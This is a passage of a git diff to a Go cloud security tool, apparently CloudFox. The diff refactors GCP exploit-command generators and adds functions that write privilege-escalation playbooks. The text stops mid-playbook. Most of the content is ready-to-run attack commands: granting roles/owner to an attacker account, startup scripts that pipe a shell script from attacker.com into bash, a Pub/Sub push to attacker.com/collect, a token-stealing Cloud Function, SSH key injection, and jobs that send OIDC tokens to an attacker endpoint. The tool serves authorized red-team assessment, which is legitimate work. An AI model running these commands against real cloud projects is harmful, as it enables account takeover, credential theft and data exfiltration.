generateExfilExploitCmd(cap.Permission, cap.ProjectID), + attackpathservice.GenerateExfilCommand(cap.Permission, cap.ProjectID, cap.ProjectID), ) } @@ -1287,210 +1300,63 @@ func (m *WhoAmIModule) generateLoot() { cap.Description, cap.SourceRole, cap.SourceScope, - generateLateralExploitCmd(cap.Permission, cap.ProjectID), + attackpathservice.GenerateLateralCommand(cap.Permission, cap.ProjectID, cap.ProjectID), ) } - } -} -// generatePrivescExploitCmd generates an exploit command for a privilege escalation permission -func generatePrivescExploitCmd(permission, projectID string) string { - switch permission { - // Service Account Impersonation - case "iam.serviceAccounts.getAccessToken": - return fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=SA_EMAIL@%s.iam.gserviceaccount.com", projectID) - case "iam.serviceAccounts.implicitDelegation": - return fmt.Sprintf("# Chain impersonation through intermediary SA\ngcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) - case "iam.serviceAccounts.signBlob": - return fmt.Sprintf("gcloud iam service-accounts sign-blob --iam-account=SA_EMAIL@%s.iam.gserviceaccount.com input.txt output.sig", projectID) - case "iam.serviceAccounts.signJwt": - return fmt.Sprintf("gcloud iam service-accounts sign-jwt --iam-account=SA_EMAIL@%s.iam.gserviceaccount.com jwt.json signed_jwt.txt", projectID) - - // Service Account Key Creation - case "iam.serviceAccountKeys.create": - return fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=SA_EMAIL@%s.iam.gserviceaccount.com", projectID) - - // IAM Policy Modification - case "resourcemanager.projects.setIamPolicy": - return fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member=user:attacker@example.com --role=roles/owner", projectID) - case "resourcemanager.folders.setIamPolicy": - return fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member=user:attacker@example.com --role=roles/owner") - case "resourcemanager.organizations.setIamPolicy": - return "gcloud organizations add-iam-policy-binding ORG_ID --member=user:attacker@example.com --role=roles/owner" - case "iam.serviceAccounts.setIamPolicy": - return fmt.Sprintf("gcloud iam service-accounts add-iam-policy-binding SA_EMAIL@%s.iam.gserviceaccount.com --member=user:attacker@example.com --role=roles/iam.serviceAccountTokenCreator", projectID) - case "iam.roles.update": - return fmt.Sprintf("gcloud iam roles update ROLE_ID --project=%s --add-permissions=iam.serviceAccounts.getAccessToken", projectID) - - // Cloud Functions - case "cloudfunctions.functions.create": - return fmt.Sprintf("gcloud functions deploy privesc-func --runtime=python39 --trigger-http --service-account=TARGET_SA@%s.iam.gserviceaccount.com --entry-point=main --source=. --project=%s", projectID, projectID) - case "cloudfunctions.functions.update": - return fmt.Sprintf("gcloud functions deploy EXISTING_FUNC --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - case "cloudfunctions.functions.sourceCodeSet": - return fmt.Sprintf("gcloud functions deploy FUNC_NAME --source=gs://BUCKET/malicious-code.zip --project=%s", projectID) - - // Compute Engine - case "compute.instances.create": - return fmt.Sprintf("gcloud compute instances create privesc-vm --service-account=TARGET_SA@%s.iam.gserviceaccount.com --scopes=cloud-platform --project=%s", projectID, projectID) - case "compute.instances.setServiceAccount": - return fmt.Sprintf("gcloud compute instances set-service-account INSTANCE_NAME --service-account=TARGET_SA@%s.iam.gserviceaccount.com --zone=ZONE --project=%s", projectID, projectID) - case "compute.instances.setMetadata": - return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE_NAME --metadata=startup-script='curl http://attacker.com/shell.sh | bash' --zone=ZONE --project=%s", projectID) - - // Cloud Run - case "run.services.create": - return fmt.Sprintf("gcloud run deploy privesc-svc --image=IMAGE --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - case "run.services.update": - return fmt.Sprintf("gcloud run services update SERVICE_NAME --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - - // Cloud Scheduler / Tasks - case "cloudscheduler.jobs.create": - return fmt.Sprintf("gcloud scheduler jobs create http privesc-job --schedule='* * * * *' --uri=https://TARGET --oidc-service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - case "cloudtasks.tasks.create": - return fmt.Sprintf("gcloud tasks create-http-task --queue=QUEUE --url=https://TARGET --oidc-service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - - // Kubernetes / GKE - case "container.clusters.getCredentials": - return fmt.Sprintf("gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE --project=%s", projectID) - - // Deployment Manager - case "deploymentmanager.deployments.create": - return fmt.Sprintf("gcloud deployment-manager deployments create privesc-deploy --config=config.yaml --project=%s", projectID) - - // Composer / Airflow - case "composer.environments.create": - return fmt.Sprintf("gcloud composer environments create privesc-env --location=REGION --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - - // Dataproc - case "dataproc.clusters.create": - return fmt.Sprintf("gcloud dataproc clusters create privesc-cluster --service-account=TARGET_SA@%s.iam.gserviceaccount.com --region=REGION --project=%s", projectID, projectID) - - // Dataflow - case "dataflow.jobs.create": - return fmt.Sprintf("gcloud dataflow jobs run privesc-job --gcs-location=gs://dataflow-templates --service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) - - // API Keys - case "apikeys.keys.create": - return fmt.Sprintf("gcloud alpha services api-keys create --project=%s", projectID) - - // Storage (bucket-level) - case "storage.buckets.setIamPolicy": - return fmt.Sprintf("gsutil iam ch user:attacker@example.com:objectViewer gs://BUCKET_NAME") - - // Pub/Sub - case "pubsub.topics.setIamPolicy": - return fmt.Sprintf("gcloud pubsub topics add-iam-policy-binding TOPIC --member=user:attacker@example.com --role=roles/pubsub.publisher --project=%s", projectID) - case "pubsub.subscriptions.setIamPolicy": - return fmt.Sprintf("gcloud pubsub subscriptions add-iam-policy-binding SUBSCRIPTION --member=user:attacker@example.com --role=roles/pubsub.subscriber --project=%s", projectID) - - // Service Usage - case "serviceusage.services.enable": - return fmt.Sprintf("gcloud services enable iamcredentials.googleapis.com --project=%s", projectID) - - default: - return fmt.Sprintf("# Permission: %s - Refer to GCP documentation for exploitation", permission) + // Generate playbooks using centralized attackpathService functions + m.generatePlaybooks() } } -// generateExfilExploitCmd generates an exploit command for a data exfil permission -func generateExfilExploitCmd(permission, projectID string) string { - switch permission { - // Compute - case "compute.images.create": - return fmt.Sprintf("gcloud compute images create exfil-image --source-disk=DISK_NAME --source-disk-zone=ZONE --project=%s", projectID) - case "compute.snapshots.create": - return fmt.Sprintf("gcloud compute snapshots create exfil-snapshot --source-disk=DISK_NAME --source-disk-zone=ZONE --project=%s", projectID) - case "compute.disks.createSnapshot": - return fmt.Sprintf("gcloud compute disks snapshot DISK_NAME --snapshot-names=exfil-snapshot --zone=ZONE --project=%s", projectID) - - // Logging - case "logging.sinks.create": - return fmt.Sprintf("gcloud logging sinks create exfil-sink pubsub.googleapis.com/projects/EXTERNAL_PROJECT/topics/stolen-logs --project=%s", projectID) - case "logging.logEntries.list": - return fmt.Sprintf("gcloud logging read 'logName:projects/%s/logs/' --limit=1000 --project=%s", projectID, projectID) - - // Cloud SQL - case "cloudsql.instances.export": - return fmt.Sprintf("gcloud sql export sql INSTANCE_NAME gs://BUCKET/export.sql --database=DB_NAME --project=%s", projectID) - case "cloudsql.backupRuns.create": - return fmt.Sprintf("gcloud sql backups create --instance=INSTANCE_NAME --project=%s", projectID) - - // Pub/Sub - case "pubsub.subscriptions.create": - return fmt.Sprintf("gcloud pubsub subscriptions create exfil-sub --topic=TOPIC_NAME --push-endpoint=https://attacker.com/collect --project=%s", projectID) - case "pubsub.subscriptions.consume": - return fmt.Sprintf("gcloud pubsub subscriptions pull SUBSCRIPTION_NAME --limit=100 --project=%s", projectID) - - // BigQuery - case "bigquery.tables.export": - return fmt.Sprintf("bq extract --destination_format=CSV '%s:DATASET.TABLE' gs://BUCKET/export.csv", projectID) - case "bigquery.tables.getData": - return fmt.Sprintf("bq query --use_legacy_sql=false 'SELECT * FROM `%s.DATASET.TABLE` LIMIT 1000'", projectID) - case "bigquery.jobs.create": - return fmt.Sprintf("bq query --use_legacy_sql=false --destination_table=%s:DATASET.EXFIL_TABLE 'SELECT * FROM `%s.DATASET.SOURCE_TABLE`'", projectID, projectID) - - // Storage Transfer - case "storagetransfer.jobs.create": - return fmt.Sprintf("gcloud transfer jobs create gs://SOURCE_BUCKET s3://DEST_BUCKET --project=%s", projectID) - - // Secret Manager - case "secretmanager.versions.access": - return fmt.Sprintf("gcloud secrets versions access latest --secret=SECRET_NAME --project=%s", projectID) - case "secretmanager.secrets.list": - return fmt.Sprintf("gcloud secrets list --project=%s", projectID) - - // Cloud Storage - case "storage.objects.get": - return fmt.Sprintf("gsutil cp gs://BUCKET/OBJECT ./local-file --project=%s", projectID) - case "storage.objects.list": - return fmt.Sprintf("gsutil ls -r gs://BUCKET_NAME --project=%s", projectID) - case "storage.buckets.list": - return fmt.Sprintf("gsutil ls --project=%s", projectID) - - // Firestore / Datastore - case "datastore.entities.list": - return fmt.Sprintf("gcloud datastore export gs://BUCKET --project=%s", projectID) - case "firestore.documents.list": - return fmt.Sprintf("gcloud firestore export gs://BUCKET --project=%s", projectID) - - // Spanner - case "spanner.databases.read": - return fmt.Sprintf("gcloud spanner databases execute-sql DATABASE --instance=INSTANCE --sql='SELECT * FROM TABLE' --project=%s", projectID) - - // KMS (for decrypting encrypted data) - case "cloudkms.cryptoKeyVersions.useToDecrypt": - return fmt.Sprintf("gcloud kms decrypt --location=LOCATION --keyring=KEYRING --key=KEY --ciphertext-file=encrypted.txt --plaintext-file=decrypted.txt --project=%s", projectID) - - default: - return fmt.Sprintf("# Permission: %s - Refer to GCP documentation", permission) +// generatePlaybooks creates playbooks using the centralized attackpathService playbook functions +func (m *WhoAmIModule) generatePlaybooks() { + // Convert PrivEscPaths to AttackPaths for the centralized function + var privescAttackPaths []attackpathservice.AttackPath + for _, path := range m.PrivEscPaths { + privescAttackPaths = append(privescAttackPaths, attackpathservice.AttackPath{ + Principal: m.Identity.Email, + PrincipalType: m.Identity.Type, + Method: path.Permission, + Category: path.Category, + Description: path.Description, + ScopeName: path.SourceScope, + ProjectID: path.ProjectID, + }) } -} - -// generateLateralExploitCmd generates an exploit command for a lateral movement permission -func generateLateralExploitCmd(permission, projectID string) string { - switch permission { - case "compute.networks.addPeering": - return fmt.Sprintf("gcloud compute networks peerings create lateral-peering --network=NETWORK_NAME --peer-network=projects/TARGET_PROJECT/global/networks/TARGET_NETWORK --project=%s", projectID) - case "compute.instances.osLogin": - return fmt.Sprintf("gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=%s", projectID) - case "compute.instances.osAdminLogin": - return fmt.Sprintf("gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=%s # Then: sudo su", projectID) - case "compute.instances.setMetadata": - return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE_NAME --zone=ZONE --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\" --project=%s", projectID) - case "compute.projects.setCommonInstanceMetadata": - return fmt.Sprintf("gcloud compute project-info add-metadata --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\" --project=%s", projectID) - case "container.clusters.getCredentials": - return fmt.Sprintf("gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE --project=%s", projectID) - case "container.pods.exec": - return "kubectl exec -it POD_NAME -- /bin/sh" - case "compute.firewalls.create": - return fmt.Sprintf("gcloud compute firewall-rules create allow-lateral --network=NETWORK_NAME --allow=tcp:22,tcp:3389 --source-ranges=ATTACKER_IP/32 --project=%s", projectID) - case "iap.tunnelInstances.accessViaIAP": - return fmt.Sprintf("gcloud compute start-iap-tunnel INSTANCE_NAME PORT --zone=ZONE --project=%s", projectID) - default: - return fmt.Sprintf("# Permission: %s - Refer to GCP documentation", permission) + m.LootMap["whoami-privesc-playbook"].Contents = attackpathservice.GeneratePrivescPlaybook(privescAttackPaths, m.Identity.Email) + + // Convert DataExfilCapabilities to AttackPaths for the centralized function + var exfilAttackPaths []attackpathservice.AttackPath + for _, cap := range m.DataExfilCapabilities { + exfilAttackPaths = append(exfilAttackPaths, attackpathservice.AttackPath{ + Principal: m.Identity.Email, + PrincipalType: m.Identity.Type, + Method: cap.Permission, + Category: cap.Category, + RiskLevel: cap.RiskLevel, + Description: cap.Description, + ScopeName: cap.SourceScope, + ProjectID: cap.ProjectID, + }) + } + m.LootMap["whoami-data-exfil-playbook"].Contents = attackpathservice.GenerateExfilPlaybook(exfilAttackPaths, m.Identity.Email) + + // Convert LateralMoveCapabilities to AttackPaths for the centralized function + var lateralAttackPaths []attackpathservice.AttackPath + for _, cap := range m.LateralMoveCapabilities { + lateralAttackPaths = append(lateralAttackPaths, attackpathservice.AttackPath{ + Principal: m.Identity.Email, + PrincipalType: m.Identity.Type, + Method: cap.Permission, + Category: cap.Category, + RiskLevel: cap.RiskLevel, + Description: cap.Description, + ScopeName: cap.SourceScope, + ProjectID: cap.ProjectID, + }) } + m.LootMap["whoami-lateral-movement-playbook"].Contents = attackpathservice.GenerateLateralPlaybook(lateralAttackPaths, m.Identity.Email) } // ------------------------------ diff --git a/gcp/services/attackpathService/attackpathService.go b/gcp/services/attackpathService/attackpathService.go index bc28e14b..0705cf05 100644 --- a/gcp/services/attackpathService/attackpathService.go +++ b/gcp/services/attackpathService/attackpathService.go @@ -1006,7 +1006,7 @@ func (s *AttackPathService) analyzePermissionsForAttackPaths( Category: exfilPerm.Category, RiskLevel: exfilPerm.RiskLevel, Description: exfilPerm.Description, - ExploitCommand: generateExfilCommand(perm, projectID, scopeID), + ExploitCommand: GenerateExfilCommand(perm, projectID, scopeID), ProjectID: projectID, ScopeType: scopeType, ScopeID: scopeID, @@ -1029,7 +1029,7 @@ func (s *AttackPathService) analyzePermissionsForAttackPaths( Category: lateralPerm.Category, RiskLevel: lateralPerm.RiskLevel, Description: lateralPerm.Description, - ExploitCommand: generateLateralCommand(perm, projectID, scopeID), + ExploitCommand: GenerateLateralCommand(perm, projectID, scopeID), ProjectID: projectID, ScopeType: scopeType, ScopeID: scopeID, @@ -1052,7 +1052,7 @@ func (s *AttackPathService) analyzePermissionsForAttackPaths( Category: privescPerm.Category, RiskLevel: privescPerm.RiskLevel, Description: privescPerm.Description, - ExploitCommand: generatePrivescCommand(perm, projectID, scopeID), + ExploitCommand: GeneratePrivescCommand(perm, projectID, scopeID), ProjectID: projectID, ScopeType: scopeType, ScopeID: scopeID, @@ -1087,7 +1087,8 @@ func extractPrincipalEmail(member string) string { return member } -func generateExfilCommand(permission, projectID, scopeID string) string { +// GenerateExfilCommand generates an exploit command for a data exfiltration permission +func GenerateExfilCommand(permission, projectID, scopeID string) string { switch permission { case "compute.images.create": return fmt.Sprintf("gcloud compute images create exfil-image --source-disk=DISK --source-disk-zone=ZONE --project=%s", projectID) @@ -1106,7 +1107,8 @@ func generateExfilCommand(permission, projectID, scopeID string) string { } } -func generateLateralCommand(permission, projectID, scopeID string) string { +// GenerateLateralCommand generates an exploit command for a lateral movement permission +func GenerateLateralCommand(permission, projectID, scopeID string) string { switch permission { case "compute.networks.addPeering": return fmt.Sprintf("gcloud compute networks peerings create peering --network=NET --peer-network=projects/TARGET/global/networks/NET --project=%s", projectID) @@ -1123,7 +1125,8 @@ func generateLateralCommand(permission, projectID, scopeID string) string { } } -func generatePrivescCommand(permission, projectID, scopeID string) string { +// GeneratePrivescCommand generates an exploit command for a privilege escalation permission +func GeneratePrivescCommand(permission, projectID, scopeID string) string { switch permission { // Service Account Impersonation case "iam.serviceAccounts.getAccessToken": @@ -1283,3 +1286,1171 @@ func generatePrivescCommand(permission, projectID, scopeID string) string { return fmt.Sprintf("# %s - refer to GCP documentation for exploitation", permission) } } + +// GeneratePrivescPlaybook generates a comprehensive privilege escalation playbook from attack paths +func GeneratePrivescPlaybook(paths []AttackPath, identityHeader string) string { + if len(paths) == 0 { + return "" + } + + var sections strings.Builder + if identityHeader != "" { + sections.WriteString(fmt.Sprintf(`# Privilege Escalation Playbook for %s +# Generated by CloudFox +# +# This playbook provides exploitation techniques for identified privilege escalation paths. + +`, identityHeader)) + } else { + sections.WriteString(`# GCP Privilege Escalation Playbook +# Generated by CloudFox +# +# This playbook provides exploitation techniques for identified privilege escalation paths. + +`) + } + + // Group paths by category + categories := map[string][]AttackPath{ + "SA Impersonation": {}, + "Key Creation": {}, + "IAM Modification": {}, + "Compute": {}, + "Serverless": {}, + "Data Processing": {}, + "AI/ML": {}, + "Orchestration": {}, + "CI/CD": {}, + "IaC": {}, + "GKE": {}, + "Secrets": {}, + "Federation": {}, + "Org Policy": {}, + "Network Access": {}, + "SA Usage": {}, + "Billing": {}, + } + + for _, path := range paths { + if _, ok := categories[path.Category]; ok { + categories[path.Category] = append(categories[path.Category], path) + } + } + + // Service Account Impersonation + if len(categories["SA Impersonation"]) > 0 { + sections.WriteString("## Service Account Impersonation\n\n") + sections.WriteString("Principals with SA impersonation capabilities can generate tokens and act as service accounts.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["SA Impersonation"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Generate access token for a service account (iam.serviceAccounts.getAccessToken)\n") + sections.WriteString("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Sign a blob as the SA (iam.serviceAccounts.signBlob)\n") + sections.WriteString("echo 'data' | gcloud iam service-accounts sign-blob - signed.txt \\\n") + sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Sign a JWT as the SA (iam.serviceAccounts.signJwt)\n") + sections.WriteString("gcloud iam service-accounts sign-jwt input.json output.jwt \\\n") + sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Generate OIDC token (iam.serviceAccounts.getOpenIdToken)\n") + sections.WriteString("gcloud auth print-identity-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // Key Creation + if len(categories["Key Creation"]) > 0 { + sections.WriteString("## Persistent Key Creation\n\n") + sections.WriteString("Principals with key creation capabilities can create long-lived credentials.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Key Creation"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create persistent SA key (iam.serviceAccountKeys.create)\n") + sections.WriteString("gcloud iam service-accounts keys create key.json \\\n") + sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Use the key\n") + sections.WriteString("gcloud auth activate-service-account --key-file=key.json\n\n") + sections.WriteString("# Create HMAC key for S3-compatible access (storage.hmacKeys.create)\n") + sections.WriteString("gcloud storage hmac create TARGET_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // IAM Modification + if len(categories["IAM Modification"]) > 0 { + sections.WriteString("## IAM Policy Modification\n\n") + sections.WriteString("Principals with IAM modification capabilities can grant themselves elevated access.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["IAM Modification"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Grant Owner role at project level\n") + sections.WriteString("gcloud projects add-iam-policy-binding PROJECT_ID \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/owner'\n\n") + sections.WriteString("# Grant SA impersonation on a privileged SA\n") + sections.WriteString("gcloud iam service-accounts add-iam-policy-binding \\\n") + sections.WriteString(" TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/iam.serviceAccountTokenCreator'\n\n") + sections.WriteString("# Create custom role with escalation permissions\n") + sections.WriteString("gcloud iam roles create privesc --project=PROJECT_ID \\\n") + sections.WriteString(" --permissions='iam.serviceAccounts.getAccessToken,iam.serviceAccountKeys.create'\n") + sections.WriteString("```\n\n") + } + + // Compute + if len(categories["Compute"]) > 0 { + sections.WriteString("## Compute Instance Exploitation\n\n") + sections.WriteString("Principals with compute permissions can create instances or modify metadata to escalate privileges.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Compute"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create instance with privileged SA (compute.instances.create + iam.serviceAccounts.actAs)\n") + sections.WriteString("gcloud compute instances create pwned \\\n") + sections.WriteString(" --zone=us-central1-a \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --scopes=cloud-platform\n\n") + sections.WriteString("# SSH and steal token\n") + sections.WriteString("gcloud compute ssh pwned --zone=us-central1-a \\\n") + sections.WriteString(" --command='curl -s -H \"Metadata-Flavor: Google\" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") + sections.WriteString("# Inject startup script for reverse shell (compute.instances.setMetadata)\n") + sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") + sections.WriteString(" --metadata=startup-script='#!/bin/bash\n") + sections.WriteString("curl http://ATTACKER/shell.sh | bash'\n\n") + sections.WriteString("# Add SSH key via metadata\n") + sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") + sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n\n") + sections.WriteString("# Project-wide SSH key injection (compute.projects.setCommonInstanceMetadata)\n") + sections.WriteString("gcloud compute project-info add-metadata \\\n") + sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n") + sections.WriteString("```\n\n") + } + + // Serverless + if len(categories["Serverless"]) > 0 { + sections.WriteString("## Serverless Function/Service Exploitation\n\n") + sections.WriteString("Principals with serverless permissions can deploy code that runs as privileged service accounts.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Serverless"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - Cloud Functions:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create function that steals SA token\n") + sections.WriteString("mkdir /tmp/pwn && cd /tmp/pwn\n") + sections.WriteString("cat > main.py << 'EOF'\n") + sections.WriteString("import functions_framework\n") + sections.WriteString("import requests\n\n") + sections.WriteString("@functions_framework.http\n") + sections.WriteString("def pwn(request):\n") + sections.WriteString(" r = requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token',\n") + sections.WriteString(" headers={'Metadata-Flavor': 'Google'})\n") + sections.WriteString(" return r.json()\n") + sections.WriteString("EOF\n") + sections.WriteString("echo 'functions-framework\\nrequests' > requirements.txt\n\n") + sections.WriteString("# Deploy with target SA\n") + sections.WriteString("gcloud functions deploy token-stealer --gen2 --runtime=python311 \\\n") + sections.WriteString(" --trigger-http --allow-unauthenticated \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Cloud Run:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Deploy Cloud Run service with target SA\n") + sections.WriteString("gcloud run deploy token-stealer --image=gcr.io/PROJECT/stealer \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --allow-unauthenticated\n") + sections.WriteString("```\n\n") + } + + // Data Processing + if len(categories["Data Processing"]) > 0 { + sections.WriteString("## Data Processing Service Exploitation\n\n") + sections.WriteString("Principals with data processing permissions can submit jobs that run as privileged service accounts.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Data Processing"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - Dataproc:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create Dataproc cluster with privileged SA\n") + sections.WriteString("gcloud dataproc clusters create pwned \\\n") + sections.WriteString(" --region=us-central1 \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Submit job to steal token\n") + sections.WriteString("gcloud dataproc jobs submit pyspark token_stealer.py \\\n") + sections.WriteString(" --cluster=pwned --region=us-central1\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Dataflow:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create Dataflow job with privileged SA\n") + sections.WriteString("gcloud dataflow jobs run pwned \\\n") + sections.WriteString(" --gcs-location=gs://dataflow-templates/latest/Word_Count \\\n") + sections.WriteString(" --service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // AI/ML + if len(categories["AI/ML"]) > 0 { + sections.WriteString("## AI/ML Platform Exploitation\n\n") + sections.WriteString("Principals with AI/ML permissions can create notebooks or training jobs that run as privileged SAs.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["AI/ML"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - Vertex AI Workbench:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create notebook instance with privileged SA\n") + sections.WriteString("gcloud notebooks instances create privesc-notebook \\\n") + sections.WriteString(" --location=us-central1-a \\\n") + sections.WriteString(" --machine-type=n1-standard-4 \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Access the notebook via JupyterLab UI or proxy\n") + sections.WriteString("gcloud notebooks instances describe privesc-notebook --location=us-central1-a\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Vertex AI Custom Jobs:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create custom training job with privileged SA\n") + sections.WriteString("gcloud ai custom-jobs create \\\n") + sections.WriteString(" --region=us-central1 \\\n") + sections.WriteString(" --display-name=privesc-job \\\n") + sections.WriteString(" --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=gcr.io/PROJECT/token-stealer \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // Orchestration + if len(categories["Orchestration"]) > 0 { + sections.WriteString("## Orchestration Service Exploitation\n\n") + sections.WriteString("Principals with orchestration permissions can create environments that run as privileged SAs.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Orchestration"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - Cloud Composer:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Composer environments run Airflow with a highly privileged SA\n") + sections.WriteString("gcloud composer environments create pwned \\\n") + sections.WriteString(" --location=us-central1 \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Upload malicious DAG to steal credentials\n") + sections.WriteString("gcloud composer environments storage dags import \\\n") + sections.WriteString(" --environment=pwned --location=us-central1 \\\n") + sections.WriteString(" --source=malicious_dag.py\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Cloud Scheduler:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create scheduled job that runs with target SA (OIDC auth)\n") + sections.WriteString("gcloud scheduler jobs create http privesc-job \\\n") + sections.WriteString(" --schedule='* * * * *' \\\n") + sections.WriteString(" --uri='https://ATTACKER_CONTROLLED_ENDPOINT/receive' \\\n") + sections.WriteString(" --oidc-service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --location=us-central1\n") + sections.WriteString("```\n\n") + sections.WriteString("### Exploitation - Cloud Tasks:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create task queue\n") + sections.WriteString("gcloud tasks queues create privesc-queue --location=us-central1\n\n") + sections.WriteString("# Create HTTP task with OIDC token\n") + sections.WriteString("gcloud tasks create-http-task \\\n") + sections.WriteString(" --queue=privesc-queue \\\n") + sections.WriteString(" --url='https://ATTACKER_CONTROLLED_ENDPOINT/receive' \\\n") + sections.WriteString(" --oidc-service-account-email=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --location=us-central1\n") + sections.WriteString("```\n\n") + } + + // CI/CD + if len(categories["CI/CD"]) > 0 { + sections.WriteString("## CI/CD Service Exploitation\n\n") + sections.WriteString("Principals with CI/CD permissions can run builds with the Cloud Build service account.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["CI/CD"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create malicious cloudbuild.yaml\n") + sections.WriteString("cat > cloudbuild.yaml << 'EOF'\n") + 